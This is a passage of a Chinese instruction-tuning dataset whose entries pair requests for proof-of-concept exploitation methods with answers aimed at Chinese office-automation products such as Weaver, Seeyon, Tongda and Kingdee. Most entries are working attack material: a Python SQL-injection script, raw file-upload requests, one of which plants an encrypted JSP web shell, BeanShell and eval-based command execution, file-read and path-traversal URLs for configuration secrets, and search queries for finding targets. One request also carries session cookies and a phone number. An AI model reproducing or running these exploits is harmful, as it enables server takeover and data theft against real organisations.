d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1\"\n    res=requests.post(url=target,data=payload,headers=headers,timeout=10)\n    res.encoding=res.apparent_encoding\n    print(res.text)\n\nif __name__ == '__main__':\n    url=sys.argv[1]\n    exploit(url)\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA WorkflowCenterTreeData SQL注入漏洞.md"}
    903. 

  903. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA wpsAssistServlet 任意文件上传漏洞\n漏洞描述:致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限\n影响版本:``` 致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1) 致远OA G6、G6N (V8.1、V8.1SP1) ```\n网络测绘:``` app=\"致远互联-OA\" && title=\"V8.0SP2\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)\n致远OA G6、G6N (V8.1、V8.1SP1)\n2. app=\"致远互联-OA\" && title=\"V8.0SP2\"\n3. private Map<String, Object> oaSaveFile(HttpServletRequest request, Map<String, Object> param) throws Exception {\n        Map<String, Object> result = Maps.newHashMap();\n        result.put(BusinessKey.OfficeTransResultFlag.getCode(), (Object)null);\n        Long fileId = MapUtils.getLong(param, \"fileId\");\n        log.info(\"wpsAssist SaveFile start!fileId=\" + fileId);\n        String newPdfFileId = MapUtils.getString(param, \"newPdfFileId\");\n        if (Strings.isNotBlank(newPdfFileId)) {\n            fileId = Long.valueOf(newPdfFileId);\n        }\n\n        String realFileType = MapUtils.getString(param, \"realFileType\");\n        String tempFileIdPathSuffix = SystemEnvironment.getSystemTempFolder() + File.separator + fileId + realFileType;\n        Long count = this.saveFileToPath(request, tempFileIdPathSuffix);\n        result.put(BusinessKey.FileSize.getCode(), count);\n        result.putAll(this.createOfficeTransCacheFile(fileId, tempFileIdPathSuffix, MapUtils.getString(param, \"canTransFileType\")));\n        param.put(BusinessKey.OfficeTransResultFlag.getCode(), result.get(BusinessKey.OfficeTransResultFlag.getCode()));\n        this.copyToUploadAndTrans(param);\n        return result;\n    }\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA wpsAssistServlet 任意文件上传漏洞.md"}
    904. 

  904. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.9 getdata 任意命令执行漏洞\n漏洞描述:通达OA v11.9 getdata接口存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限\n影响版本:``` 通达OA v11.9 ```\n网络测绘:``` app=\"通达OA网络智能办公系统\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"通达OA网络智能办公系统\"\n2. /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22ZWNobyB2dWxuX3Rlc3Q7%22)))%3B/*&id=19&module=Carouselimage\n3. /general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.9 getdata 任意命令执行漏洞.md"}
    905. 

  905. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:万户OA fileUpload.controller 任意文件上传漏洞\n漏洞描述:万户OA fileUpload.controller 存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件\n影响版本:``` 万户OA ```\n网络测绘:``` app=\"万户网络-ezOFFICE\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"万户网络-ezOFFICE\"\n2. POST /defaultroot/upload/fileUpload.controller HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: Keep-Alive\nContent-Type: multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0\nContent-Length: 773\n\n--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0\nContent-Disposition: form-data; name=\"file\"; filename=\"cmd.jsp\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n\n<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*......tas9er*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--\n3. <%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*......tas9er*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/万户OA fileUpload.controller 任意文件上传漏洞.md"}
    906. 

  906. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Office UserSelect 未授权访问漏洞\n漏洞描述:泛微OA E-Office UserSelect接口存在未授权访问漏洞,通过漏洞攻击者可以获取敏感信息\n影响版本:``` 泛微OA E-Office ```\n网络测绘:``` app=\"泛微-EOffice\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微OA E-Office\n2. app=\"泛微-EOffice\"\n3. /UserSelect/\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Office UserSelect 未授权访问漏洞.md"}
    907. 

  907. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞\n漏洞描述:泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等,其中 jqueryFileTree.jsp 文件中 dir 参数存在目录遍历漏洞,攻击者通过漏洞可以获取服务器文件目录信息\n影响版本:``` 泛微e-cology 9.0 ```\n网络测绘:``` app=\"泛微-协同办公OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微e-cology 9.0\n2. app=\"泛微-协同办公OA\"\n3. /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞.md"}
    908. 

  908. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.5 swfupload_new.php SQL注入漏洞\n漏洞描述:通达OA v11.5 swfupload_new.php 文件存在SQL注入漏洞,攻击者通过漏洞可获取服务器敏感信息\n影响版本:``` 通达OA v11.5 ```\n网络测绘:``` app=\"TDXK-通达OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"TDXK-通达OA\"\n2. POST /general/file_folder/swfupload_new.php HTTP/1.1\nHost: \nUser-Agent: Go-http-client/1.1\nContent-Length: 355\nContent-Type: multipart/form-data; boundary=----------GFioQpMK0vv2\nAccept-Encoding: gzip\n\n------------GFioQpMK0vv2\nContent-Disposition: form-data; name=\"ATTACHMENT_ID\"\n\n1\n------------GFioQpMK0vv2\nContent-Disposition: form-data; name=\"ATTACHMENT_NAME\"\n\n1\n------------GFioQpMK0vv2\nContent-Disposition: form-data; name=\"FILE_SORT\"\n\n2\n------------GFioQpMK0vv2\nContent-Disposition: form-data; name=\"SORT_ID\"\n\n------------GFioQpMK0vv2--\n3. User-Agent: Go-http-client/1.1\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.5 swfupload_new.php SQL注入漏洞.md"}
    909. 

  909. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:金蝶OA EAS系统 uploadLogo.action 任意文件上传漏洞\n漏洞描述:金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶 EAS 及 EAS Cloud 在 uploadLogo.action 存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。\n影响版本:金蝶OA EAS系统\n网络测绘:``` \"/easportal/\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. \"/easportal/\"\n2. POST /plt_portal/setting/uploadLogo.action HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\nAccept-Encoding: gzip\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarycxkT8bV6WLIUzm2p\n\n------WebKitFormBoundarycxkT8bV6WLIUzm2p\nContent-Disposition: form-data; name=\"chooseLanguage_top\"\nch\n\n------WebKitFormBoundarycxkT8bV6WLIUzm2p\nContent-Disposition: form-data; name=\"dataCenter\"\n\nxx\n------WebKitFormBoundarycxkT8bV6WLIUzm2p \nContent-Disposition: form-data; name=\"insId\"\n\n------WebKitFormBoundarycxkT8bV6WLIUzm2p\nContent-Disposition: form-data; name=\"type\"\n\ntop\n------WebKitFormBoundarycxkT8bV6WLIUzm2p\nContent-Disposition: form-data; name=\"upload\"; filename=\"text.jsp\"\nContent-Type: image/jpeg\n\nTest\n------WebKitFormBoundarycxkT8bV6WLIUzm2p--\n3. /portal/res/file/upload/xxx.jsp\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/金蝶OA EAS系统 uploadLogo.action 任意文件上传漏洞.md"}
    910. 

  910. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204\n漏洞描述:2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁, 泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行, 漏洞等级严重.\n影响版本:``` E-cology 7.0 E-cology 8.0 E-cology 8.1 E-cology 9.0 ```\n网络测绘:``` app=“泛微-协同办公OA” ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=“泛微-协同办公OA”\n2. E-cology 7.0\nE-cology 8.0\nE-cology 8.1\nE-cology 9.0\n3. POST /weaver/bsh.servlet.BshServlet HTTP/1.1\nHost: xxxxxxxx:8088\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Length: 98\nContent-Type: application/x-www-form-urlencoded\n\nbsh.script=ex\\u0065c(\"cmd /c dir\");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Cology BshServlet 远程代码执行漏洞 CNVD-2019-32204.md"}
    911. 

  911. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA ln.FileDownload 任意文件读取漏洞\n漏洞描述:泛微OA ln.FileDownload 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件\n影响版本:``` 泛微OA V8 ```\n网络测绘:``` app=\"泛微-协同办公OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"泛微-协同办公OA\"\n2. /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA ln.FileDownload 任意文件读取漏洞.md"}
    912. 

  912. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.8 update.php 后台文件包含命令执行漏洞\n漏洞描述:通达OA v11.8以下存在文件上传接口,可上传 .user.ini 文件包含有PHP语句的文件导致命令执行\n影响版本:``` 通达OA < v11.8 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 通达OA < v11.8\n2. <?php\n\ninclude_once \"inc/auth.inc.php\";\ninclude_once \"inc/utility_all.php\";\ninclude_once \"inc/utility_file.php\";\ninclude_once \"inc/utility_field.php\";\ninclude_once \"inc/utility_cache.php\";\ninclude_once \"general/system/log/annual_leave_log.php\";\nif (strstr($BYNAME, \"/\") || strstr($BYNAME, \"\\\\\") || strstr($BYNAME, \"..\")) {\n\tMessage(_(\"错误\"), _(\"OA用户名包含非法字符!\"));\n\texit();\n}\n\ninclude_once \"inc/header.inc.php\";\necho \"\\r\\n<body class=\\\"bodycolor\\\">\\r\\n\";\necho \"\\r\\n<body class=\\\"bodycolor\\\">\\r\\n\";\n$PHOTO_NAME0 = $_FILES[\"ATTACHMENT\"][\"name\"];\n$ATTACHMENT = $_FILES[\"ATTACHMENT\"][\"tmp_name\"];\n\nif ($PHOTO_NAME0 != \"\") {\n\t$FULL_PATH = MYOA_ATTACH_PATH . \"hrms_pic\";\n\n\tif (!file_exists($FULL_PATH)) {\n\t\t@mkdir($FULL_PATH, 448);\n\t}\n\n\t$PHOTO_NAME = $USER_ID . substr($PHOTO_NAME0, strrpos($PHOTO_NAME0, \".\"));\n\t$FILENAME = MYOA_ATTACH_PATH . \"hrms_pic/\" . $PHOTO_NAME;\n\ttd_copy($ATTACHMENT, $FILENAME);\n\n\tif (file_exists($ATTACHMENT)) {\n\t\tunlink($ATTACHMENT);\n\t}\n\n\tif (!file_exists($FILENAME)) {\n\t\tMessage(_(\"附件上传失败\"), _(\"原因:附件文件为空或文件名太长,或附件大于30兆字节,或文件路径不存在!\"));\n\t\tButton_Back();\n\t\texit();\n\t}\n}\n3. auto_prepend_file=peiqi.log\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.8 update.php 后台文件包含命令执行漏洞.md"}
    913. 

  913. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:智明 SmartOA EmailDownload.ashx 任意文件下载漏洞\n漏洞描述:智明 SmartOA EmailDownload.ashx文件存在任意文件下载漏洞,通过漏洞可下载服务器上的敏感文件,查看敏感信息\n影响版本:``` 智明 SmartOA ```\n网络测绘:``` app=\"智明协同-SmartOA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"智明协同-SmartOA\"\n2. /file/EmailDownload.ashx?url=~/web.config&name=web.config\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/智明 SmartOA EmailDownload.ashx 任意文件下载漏洞.md"}
    914. 

  914. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Weaver SignatureDownLoad 任意文件读取漏洞\n漏洞描述:泛微OA E-Weaver SignatureDownLoad接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件\n影响版本:泛微OA E-Weaver\n网络测绘:``` app=\"泛微-E-Weaver\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"泛微-E-Weaver\"\n2. /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27C:/Windows/win.ini%27\n3. /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Weaver SignatureDownLoad 任意文件读取漏洞.md"}
    915. 

  915. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:蓝凌OA kmImeetingRes.do 后台SQL注入漏洞 CNVD-2021-01363\n漏洞描述:深圳市蓝凌软件股份有限公司数字OA(EKP)存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。\n影响版本:``` 蓝凌OA ```\n网络测绘:``` app=\"Landray-OA系统\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"Landray-OA系统\"\n2. https://xxx.xxx.xxx.xxx/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true\n3. GET /km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nConnection: close\nPragma: no-cache\nCache-Control: no-cache\nsec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"\nsec-ch-ua-mobile: ?0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: cross-site\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: UM_distinctid=1785f7392888e1-02ece8c7e9a996-5771031-1fa400-1785f73928943d; landray_danyuan=null; landray_guanjianci=null; landray_sorce=baidupinzhuanwy; landray_jihua=null; JSESSIONID=232B6933CF33B5422F9D2649739D48FE; Hm_lvt_223eecc93377a093d4111a2d7ea28f51=1616509114,1616566341,1616566350; Hm_lpvt_223eecc93377a093d4111a2d7ea28f51=1616566350; Hm_lvt_d14cb406f01f8101884d7cf81981d8bb=1616509114,1616566341,1616566350; Hm_lpvt_d14cb406f01f8101884d7cf81981d8bb=1616566507; Hm_lvt_95f4f43e7aa1fe68a51c44ae4eed925d=1616509872,1616509969,1616509973,1616566507; Hm_lpvt_95f4f43e7aa1fe68a51c44ae4eed925d=1616566507; Hm_lvt_22f1fea4412727d23e6a998a4b46f2ab=1616509872,1616509969,1616509973,1616566507; Hm_lpvt_22f1fea4412727d23e6a998a4b46f2ab=1616566507; fd_name=%E5%95%8A%E7%9A%84%E5%93%88; fd_id=1785f817dd0f5a4beaa482646cb9a2d8; nc_phone=15572002383; j_lang=zh-CN; LtpaToken=AAECAzYwNUFEOEZBNjA1QjgxQkFsdW9stJ5e1pcW1hgQi3cOa0iEyAhdZZs=; Hm_lvt_95cec2a2f107db33ad817ed8e4a3073b=1616510026,1616566523; Hm_lpvt_95cec2a2f107db33ad817ed8e4a3073b=1616566523; add_customer=0\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/蓝凌OA kmImeetingRes.do 后台SQL注入漏洞 CNVD-2021-01363.md"}
    916. 

  916. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞\n漏洞描述:泛微 E-Office mysql_config.ini文件可直接访问,泄漏数据库账号密码等信息\n影响版本:``` 泛微 E-Office ```\n网络测绘:``` app=\"泛微-EOffice\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微 E-Office\n2. app=\"泛微-EOffice\"\n3. /mysql_config.ini\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞.md"}
    917. 

  917. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Office OfficeServer.php 任意文件上传漏洞\n漏洞描述:泛微OA E-Office OfficeServer.php 存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器敏感信息\n影响版本:``` 泛微OA E-Office ```\n网络测绘:``` \"eoffice10\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微OA E-Office\n2. \"eoffice10\"\n3. POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1\nHost: \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCache-Control: max-age=0\nConnection: close\nContent-Length: 990\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryLpoiBFy4ANA8daew\nOrigin: null\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\n\n------WebKitFormBoundaryLpoiBFy4ANA8daew\nContent-Disposition: form-data;name=\"FileData\";filename=\"test.php\"\nContent-Type: application/octet-stream\n\n<?php\nphpinfo();\n?>\n\n------WebKitFormBoundaryLpoiBFy4ANA8daew\nContent-Disposition: form-data;name=\"FormData\"\n\n{'USERNAME':'admin','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}\n------WebKitFormBoundaryLpoiBFy4ANA8daew--\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Office OfficeServer.php 任意文件上传漏洞.md"}
    918. 

  918. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.8 update.php 后台文件包含XSS漏洞\n漏洞描述:通达OA v11.8以下存在文件上传接口,可上传 .user.ini 文件包含有xss语句的文件,使管理员后台文件均包含XSS语句,被攻击者获取敏感信息\n影响版本:``` 通达OA < v11.8 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 通达OA < v11.8\n2. <?php\n\ninclude_once \"inc/auth.inc.php\";\ninclude_once \"inc/utility_all.php\";\ninclude_once \"inc/utility_file.php\";\ninclude_once \"inc/utility_field.php\";\ninclude_once \"inc/utility_cache.php\";\ninclude_once \"general/system/log/annual_leave_log.php\";\nif (strstr($BYNAME, \"/\") || strstr($BYNAME, \"\\\\\") || strstr($BYNAME, \"..\")) {\n\tMessage(_(\"错误\"), _(\"OA用户名包含非法字符!\"));\n\texit();\n}\n\ninclude_once \"inc/header.inc.php\";\necho \"\\r\\n<body class=\\\"bodycolor\\\">\\r\\n\";\necho \"\\r\\n<body class=\\\"bodycolor\\\">\\r\\n\";\n$PHOTO_NAME0 = $_FILES[\"ATTACHMENT\"][\"name\"];\n$ATTACHMENT = $_FILES[\"ATTACHMENT\"][\"tmp_name\"];\n\nif ($PHOTO_NAME0 != \"\") {\n\t$FULL_PATH = MYOA_ATTACH_PATH . \"hrms_pic\";\n\n\tif (!file_exists($FULL_PATH)) {\n\t\t@mkdir($FULL_PATH, 448);\n\t}\n\n\t$PHOTO_NAME = $USER_ID . substr($PHOTO_NAME0, strrpos($PHOTO_NAME0, \".\"));\n\t$FILENAME = MYOA_ATTACH_PATH . \"hrms_pic/\" . $PHOTO_NAME;\n\ttd_copy($ATTACHMENT, $FILENAME);\n\n\tif (file_exists($ATTACHMENT)) {\n\t\tunlink($ATTACHMENT);\n\t}\n\n\tif (!file_exists($FILENAME)) {\n\t\tMessage(_(\"附件上传失败\"), _(\"原因:附件文件为空或文件名太长,或附件大于30兆字节,或文件路径不存在!\"));\n\t\tButton_Back();\n\t\texit();\n\t}\n}\n3. auto_prepend_file=test.log\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.8 update.php 后台文件包含XSS漏洞.md"}
    919. 

  919. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 移动管理系统 uploadApk.do 任意文件上传漏洞\n漏洞描述:用友 移动管理系统 uploadApk.do 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限\n影响版本:用友 移动管理系统\n网络测绘:``` app=\"用友-移动系统管理\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"用友-移动系统管理\"\n2. POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1\nHost: \nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nCookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server\nConnection: close\n\n------WebKitFormBoundaryvLTG6zlX0gZ8LzO3\nContent-Disposition: form-data; name=\"downloadpath\"; filename=\"a.jsp\"\nContent-Type: application/msword\n\nhello\n------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--\n3. /maupload/apk/a.jsp\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 移动管理系统 uploadApk.do 任意文件上传漏洞.md"}
    920. 

  920. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA uploadOperation.jsp 任意文件上传\n漏洞描述:``` 泛微OA V9 存在文件上传接口导致任意文件上传 ```\n影响版本:``` 泛微OA V9 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微OA V9 存在文件上传接口导致任意文件上传\n2. POST /page/exportImport/uploadOperation.jsp HTTP/1.1\nHost: xxx.xxx.xxx.xxx\nContent-Length: 397\nPragma: no-cache\nCache-Control: no-cache\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68\nOrigin: null\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: 